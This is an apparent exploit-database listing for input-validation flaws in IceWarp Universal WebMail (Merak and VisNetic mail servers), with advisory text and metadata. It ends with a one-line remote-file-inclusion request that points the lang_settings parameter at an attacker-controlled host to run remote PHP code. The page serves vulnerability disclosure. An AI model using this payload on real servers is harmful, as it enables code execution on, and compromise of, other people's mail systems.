Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
IceWarp Universal WebMail Input-Validation Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
Universal WebMail
by:
Unknown
7.5
CVSS
HIGH
Input-Validation
79
CWE
Product Name: Universal WebMail
Affected Version From: Merak Mail Server 8.3.0.r, VisNetic MailServer 8.3.0 build 1
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:icewarp:universal_webmail
Metasploit:
Other Scripts:
Platforms Tested:
2007

IceWarp Universal WebMail Input-Validation Vulnerabilities

The IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Additionally, an attacker can exploit these issues to obtain the contents of local files.

Mitigation:

Update to a patched version of Merak Mail Server or VisNetic MailServer.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16069/info
 
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
 
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
 
Additionally, an attacker can exploit these issues to obtain the contents of local files.
 
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
 
UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild.

http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/